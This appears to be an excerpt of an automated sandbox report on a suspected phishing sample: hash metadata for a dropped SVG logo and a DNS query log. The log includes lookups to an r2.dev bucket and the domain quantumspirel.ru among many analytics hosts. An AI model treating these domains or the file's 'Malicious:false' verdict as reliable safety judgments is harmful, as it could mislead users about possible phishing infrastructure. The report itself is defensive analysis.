                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4963
                                                                                                                                                                                                        Entropy (8bit):3.970797149265085
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:JkDoaxJ7kt/QAGyHFVE/MYGsO4UpA1ndwrqeZJra31p3V8+49KPDRGo6bRA4ypAM:CVJ7iofyqfOppWwZraPlX4CqRANpQm
                                                                                                                                                                                                        MD5:2F52541F2143D87A00C9AA8D3B0E5685
                                                                                                                                                                                                        SHA1:213961D20B78063D0687560377085E82CAF4073B
                                                                                                                                                                                                        SHA-256:D35DE356A78CC0D848D67D07C3200614884C8466B496BF563A4CF3C85AA81CE2
                                                                                                                                                                                                        SHA-512:38489A5AF26325CFDEA11C9CC1DCF537EE224E309B539035F99888FE194EBE119C89FAE05DC3DBEC511C0704626F26FEDD53BE7481B4A7A0C85E26840DAFC3BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<svg width="123" height="30" viewBox="0 0 123 30" xmlns="http://www.w3.org/2000/svg">. <g fill-rule="nonzero" fill="none">. <path d="M32.118 10.631h12.363v2.302h-4.868v12.973h-2.668V12.933h-4.847l.02-2.302zm11.833 4.216h2.281v2.139h.04c.082-.306.225-.59.429-.876.203-.285.448-.55.753-.774.285-.244.611-.428.978-.57a2.845 2.845 0 0 1 1.08-.224c.284 0 .488.02.59.02.102.02.224.04.326.04v2.343c-.163-.04-.347-.061-.53-.081-.183-.02-.346-.041-.53-.041-.407 0-.794.081-1.16.244-.367.163-.672.408-.957.713a3.862 3.862 0 0 0-.652 1.181c-.163.469-.245 1.019-.245 1.63v5.254H43.91l.041-10.998zm17.678 11.06h-2.403v-1.549h-.04c-.306.57-.754.998-1.345 1.345-.59.346-1.201.509-1.812.509-1.447 0-2.506-.346-3.157-1.08-.652-.712-.978-1.812-.978-3.258v-7.027h2.444v6.782c0 .978.183 1.67.57 2.057.367.408.896.611 1.569.611.509 0 .936-.081 1.283-.244.346-.163.631-.367.835-.631.224-.265.366-.591.468-.958.102-.366.143-.774.143-1.201v-6.416h2.444v11.06h-.02zm4.155-3.544c.082.712.346 1.201.815 1.507.468.285
                                                                                                                                                                                                        No static file info
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Aug 30, 2024 18:15:35.741699934 CEST192.168.2.51.1.1.10x1af4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:35.741863966 CEST192.168.2.51.1.1.10xb3c4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.349535942 CEST192.168.2.51.1.1.10xe32eStandard query (0)prod.adobeccstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.349870920 CEST192.168.2.51.1.1.10x388fStandard query (0)prod.adobeccstatic.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.350496054 CEST192.168.2.51.1.1.10xeb3cStandard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.350702047 CEST192.168.2.51.1.1.10xf3b3Standard query (0)use.typekit.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.351120949 CEST192.168.2.51.1.1.10x72ebStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.351402998 CEST192.168.2.51.1.1.10x4c88Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:37.445230961 CEST192.168.2.51.1.1.10xb4ccStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:37.449083090 CEST192.168.2.51.1.1.10x77fbStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:38.090840101 CEST192.168.2.51.1.1.10x9ad7Standard query (0)p.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:38.090840101 CEST192.168.2.51.1.1.10xb795Standard query (0)p.typekit.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.489264011 CEST192.168.2.51.1.1.10x8fb5Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.490884066 CEST192.168.2.51.1.1.10x48fdStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.554924011 CEST192.168.2.51.1.1.10x318bStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.555171967 CEST192.168.2.51.1.1.10xdc76Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:48.319088936 CEST192.168.2.51.1.1.10x3cbfStandard query (0)js-agent.newrelic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:48.319453955 CEST192.168.2.51.1.1.10x63d2Standard query (0)js-agent.newrelic.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.045459986 CEST192.168.2.51.1.1.10x95dbStandard query (0)bam-cell.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.045825958 CEST192.168.2.51.1.1.10xc240Standard query (0)bam-cell.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.128173113 CEST192.168.2.51.1.1.10x5f4fStandard query (0)js-agent.newrelic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.129116058 CEST192.168.2.51.1.1.10x256dStandard query (0)js-agent.newrelic.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.667398930 CEST192.168.2.51.1.1.10xd248Standard query (0)bam-cell.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.668000937 CEST192.168.2.51.1.1.10x4677Standard query (0)bam-cell.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:01.193118095 CEST192.168.2.51.1.1.10x2912Standard query (0)pblc.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:01.193471909 CEST192.168.2.51.1.1.10x43f1Standard query (0)pblc.me65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:02.233675003 CEST192.168.2.51.1.1.10x9a9Standard query (0)img.pblc.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:02.233999968 CEST192.168.2.51.1.1.10xc79Standard query (0)img.pblc.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.324556112 CEST192.168.2.51.1.1.10x53b7Standard query (0)img.pblc.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.325143099 CEST192.168.2.51.1.1.10xf992Standard query (0)img.pblc.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.752707958 CEST192.168.2.51.1.1.10x60ecStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.753071070 CEST192.168.2.51.1.1.10x49beStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:13.305600882 CEST192.168.2.51.1.1.10xcd2eStandard query (0)pub-e1c6f3d85d51402790227684363ac52c.r2.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:13.306327105 CEST192.168.2.51.1.1.10xe69aStandard query (0)pub-e1c6f3d85d51402790227684363ac52c.r2.dev65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.147473097 CEST192.168.2.51.1.1.10xda54Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.147890091 CEST192.168.2.51.1.1.10x941eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.148941994 CEST192.168.2.51.1.1.10xcdc5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.149876118 CEST192.168.2.51.1.1.10x7f26Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.323309898 CEST192.168.2.51.1.1.10x27fdStandard query (0)quantumspirel.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.325973034 CEST192.168.2.51.1.1.10xe78bStandard query (0)quantumspirel.ru65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.363965988 CEST192.168.2.51.1.1.10x7fa0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.364278078 CEST192.168.2.51.1.1.10x455bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:17.222971916 CEST192.168.2.51.1.1.10xb6edStandard query (0)publicate.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:17.223200083 CEST192.168.2.51.1.1.10x182dStandard query (0)publicate.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.686904907 CEST192.168.2.51.1.1.10x8835Standard query (0)publicate.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.687134027 CEST192.168.2.51.1.1.10x134aStandard query (0)publicate.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.998087883 CEST192.168.2.51.1.1.10xfa9dStandard query (0)d3e54v103j8qbb.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.998545885 CEST192.168.2.51.1.1.10x638cStandard query (0)d3e54v103j8qbb.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.999514103 CEST192.168.2.51.1.1.10xb102Standard query (0)platform-api.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.999846935 CEST192.168.2.51.1.1.10x8c79Standard query (0)platform-api.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.004050016 CEST192.168.2.51.1.1.10x774cStandard query (0)js.hs-scripts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.004327059 CEST192.168.2.51.1.1.10x41fdStandard query (0)js.hs-scripts.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.090706110 CEST192.168.2.51.1.1.10xcab9Standard query (0)sc.lfeeder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.091161966 CEST192.168.2.51.1.1.10x6b6fStandard query (0)sc.lfeeder.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.102554083 CEST192.168.2.51.1.1.10xd35eStandard query (0)static.woopra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.102998018 CEST192.168.2.51.1.1.10xe83bStandard query (0)static.woopra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.408787966 CEST192.168.2.51.1.1.10xe109Standard query (0)quantumspirel.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.409015894 CEST192.168.2.51.1.1.10xdd13Standard query (0)quantumspirel.ru65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.150578976 CEST192.168.2.51.1.1.10xd27aStandard query (0)www.woopra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.150847912 CEST192.168.2.51.1.1.10xfb68Standard query (0)www.woopra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.239048958 CEST192.168.2.51.1.1.10xd0c7Standard query (0)static.woopra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.239201069 CEST192.168.2.51.1.1.10xfa74Standard query (0)static.woopra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.694581032 CEST192.168.2.51.1.1.10xdb51Standard query (0)tr-rc.lfeeder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.694752932 CEST192.168.2.51.1.1.10xca5bStandard query (0)tr-rc.lfeeder.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.791419983 CEST192.168.2.51.1.1.10x779aStandard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.791729927 CEST192.168.2.51.1.1.10xaa8dStandard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.792685032 CEST192.168.2.51.1.1.10x6ae6Standard query (0)static.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.792882919 CEST192.168.2.51.1.1.10x553fStandard query (0)static.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.793508053 CEST192.168.2.51.1.1.10x385eStandard query (0)assets.getalvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.793755054 CEST192.168.2.51.1.1.10x54b7Standard query (0)assets.getalvis.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:22.158626080 CEST192.168.2.51.1.1.10xe57bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:22.159306049 CEST192.168.2.51.1.1.10xbaeStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.171787024 CEST192.168.2.51.1.1.10xf297Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.176141024 CEST192.168.2.51.1.1.10xbcc8Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.181294918 CEST192.168.2.51.1.1.10x7ea1Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.181672096 CEST192.168.2.51.1.1.10x20c1Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.405091047 CEST192.168.2.51.1.1.10x8fb1Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.405246973 CEST192.168.2.51.1.1.10x8f81Standard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.405778885 CEST192.168.2.51.1.1.10xaf41Standard query (0)public.profitwell.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.406086922 CEST192.168.2.51.1.1.10x75bbStandard query (0)public.profitwell.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.469046116 CEST192.168.2.51.1.1.10xf0b7Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.469178915 CEST192.168.2.51.1.1.10x5f33Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.469511986 CEST192.168.2.51.1.1.10xaa80Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.469635010 CEST192.168.2.51.1.1.10xf3d6Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.963578939 CEST192.168.2.51.1.1.10x6096Standard query (0)d3e54v103j8qbb.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.963941097 CEST192.168.2.51.1.1.10xcadbStandard query (0)d3e54v103j8qbb.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.965409040 CEST192.168.2.51.1.1.10xc9ccStandard query (0)sc.lfeeder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.965687037 CEST192.168.2.51.1.1.10x679cStandard query (0)sc.lfeeder.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.969835043 CEST192.168.2.51.1.1.10x8ce1Standard query (0)www.woopra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.969971895 CEST192.168.2.51.1.1.10x5406Standard query (0)www.woopra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.033404112 CEST192.168.2.51.1.1.10x3f28Standard query (0)assets.getalvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.034434080 CEST192.168.2.51.1.1.10x7462Standard query (0)assets.getalvis.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.035975933 CEST192.168.2.51.1.1.10x3df4Standard query (0)tr-rc.lfeeder.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.036185980 CEST192.168.2.51.1.1.10x837cStandard query (0)tr-rc.lfeeder.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.040535927 CEST192.168.2.51.1.1.10x3c8eStandard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.040934086 CEST192.168.2.51.1.1.10x4f7dStandard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.042155981 CEST192.168.2.51.1.1.10x77a9Standard query (0)static.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.042418003 CEST192.168.2.51.1.1.10x61c3Standard query (0)static.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.078136921 CEST192.168.2.51.1.1.10x93Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.078650951 CEST192.168.2.51.1.1.10x3018Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.135384083 CEST192.168.2.51.1.1.10xd485Standard query (0)script.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.136857986 CEST192.168.2.51.1.1.10xdb70Standard query (0)script.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.683877945 CEST192.168.2.51.1.1.10x1540Standard query (0)www.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.684173107 CEST192.168.2.51.1.1.10xbcf1Standard query (0)www.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.688807011 CEST192.168.2.51.1.1.10x416cStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.689121962 CEST192.168.2.51.1.1.10xdf24Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.690257072 CEST192.168.2.51.1.1.10xead6Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.690696001 CEST192.168.2.51.1.1.10xcf70Standard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.866566896 CEST192.168.2.51.1.1.10xf4fdStandard query (0)t.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.866900921 CEST192.168.2.51.1.1.10x5ac0Standard query (0)t.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.285531998 CEST192.168.2.51.1.1.10x3be3Standard query (0)public.profitwell.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.285761118 CEST192.168.2.51.1.1.10x3529Standard query (0)public.profitwell.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.363421917 CEST192.168.2.51.1.1.10xcfc1Standard query (0)widget.intercom.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.364108086 CEST192.168.2.51.1.1.10x32d4Standard query (0)widget.intercom.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.364866972 CEST192.168.2.51.1.1.10x6b05Standard query (0)c.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.366415977 CEST192.168.2.51.1.1.10xfc2eStandard query (0)c.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.399477959 CEST192.168.2.51.1.1.10x6286Standard query (0)js.intercomcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.399838924 CEST192.168.2.51.1.1.10xc40cStandard query (0)js.intercomcdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.657463074 CEST192.168.2.51.1.1.10x45c6Standard query (0)widget.intercom.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.657721996 CEST192.168.2.51.1.1.10x4462Standard query (0)widget.intercom.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:30.380686045 CEST192.168.2.51.1.1.10xab93Standard query (0)c.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:30.380862951 CEST192.168.2.51.1.1.10x62a4Standard query (0)c.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:31.095427990 CEST192.168.2.51.1.1.10xde1cStandard query (0)js.intercomcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:31.095618010 CEST192.168.2.51.1.1.10x34bcStandard query (0)js.intercomcdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:31.204415083 CEST192.168.2.51.1.1.10xb05dStandard query (0)api-iam.intercom.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:31.205041885 CEST192.168.2.51.1.1.10x9d17Standard query (0)api-iam.intercom.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:32.431153059 CEST192.168.2.51.1.1.10xc8cfStandard query (0)nexus-websocket-a.intercom.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:32.431793928 CEST192.168.2.51.1.1.10x5607Standard query (0)nexus-websocket-a.intercom.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:32.485034943 CEST192.168.2.51.1.1.10x78b6Standard query (0)api-iam.intercom.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:32.485601902 CEST192.168.2.51.1.1.10xd9b0Standard query (0)api-iam.intercom.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:37.212187052 CEST192.168.2.51.1.1.10x5b8cStandard query (0)www.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:37.212393999 CEST192.168.2.51.1.1.10x8434Standard query (0)www.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.404194117 CEST192.168.2.51.1.1.10x91a6Standard query (0)js.driftt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.404695988 CEST192.168.2.51.1.1.10xc313Standard query (0)js.driftt.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.426006079 CEST192.168.2.51.1.1.10xaafStandard query (0)i.vimeocdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.427606106 CEST192.168.2.51.1.1.10x10b8Standard query (0)i.vimeocdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.431232929 CEST192.168.2.51.1.1.10x320aStandard query (0)seoab.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.431600094 CEST192.168.2.51.1.1.10x3261Standard query (0)seoab.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.432024002 CEST192.168.2.51.1.1.10xe927Standard query (0)lead-acquisition-service.softwareadvice.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.432351112 CEST192.168.2.51.1.1.10x4907Standard query (0)lead-acquisition-service.softwareadvice.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.599263906 CEST192.168.2.51.1.1.10xe83cStandard query (0)www.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:38.599584103 CEST192.168.2.51.1.1.10xa0a2Standard query (0)www.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.105746984 CEST192.168.2.51.1.1.10x6e92Standard query (0)lead-acquisition-service.softwareadvice.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.106048107 CEST192.168.2.51.1.1.10xfca0Standard query (0)lead-acquisition-service.softwareadvice.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.134067059 CEST192.168.2.51.1.1.10x6edfStandard query (0)seoab.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.134233952 CEST192.168.2.51.1.1.10x6e86Standard query (0)seoab.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.220235109 CEST192.168.2.51.1.1.10x2345Standard query (0)i.vimeocdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.220479012 CEST192.168.2.51.1.1.10x8233Standard query (0)i.vimeocdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.530846119 CEST192.168.2.51.1.1.10xbe2bStandard query (0)gdm-catalog-fmapi-prod.imgix.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:39.531017065 CEST192.168.2.51.1.1.10xa59eStandard query (0)gdm-catalog-fmapi-prod.imgix.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:40.222179890 CEST192.168.2.51.1.1.10x2e39Standard query (0)gdm-catalog-fmapi-prod.imgix.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:40.222336054 CEST192.168.2.51.1.1.10x740fStandard query (0)gdm-catalog-fmapi-prod.imgix.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:44.455704927 CEST192.168.2.51.1.1.10xea06Standard query (0)www.datadoghq-browser-agent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:44.456242085 CEST192.168.2.51.1.1.10x3aa3Standard query (0)www.datadoghq-browser-agent.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:46.667150021 CEST192.168.2.51.1.1.10x33ddStandard query (0)js.driftt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:46.670382023 CEST192.168.2.51.1.1.10xc001Standard query (0)js.driftt.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:46.787837982 CEST192.168.2.51.1.1.10x62cdStandard query (0)cdn.cookielaw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:46.787966967 CEST192.168.2.51.1.1.10x2923Standard query (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:47.587496042 CEST192.168.2.51.1.1.10xd34aStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:47.587646008 CEST192.168.2.51.1.1.10xda4Standard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:47.792824030 CEST192.168.2.51.1.1.10xa75bStandard query (0)forms-as-a-service.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:47.793064117 CEST192.168.2.51.1.1.10x25dfStandard query (0)forms-as-a-service.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.045140028 CEST192.168.2.51.1.1.10x9b50Standard query (0)customer.api.drift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.045562983 CEST192.168.2.51.1.1.10x4250Standard query (0)customer.api.drift.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.045989037 CEST192.168.2.51.1.1.10x1860Standard query (0)conversation.api.drift.comA (IP address)IN (0x0001)false
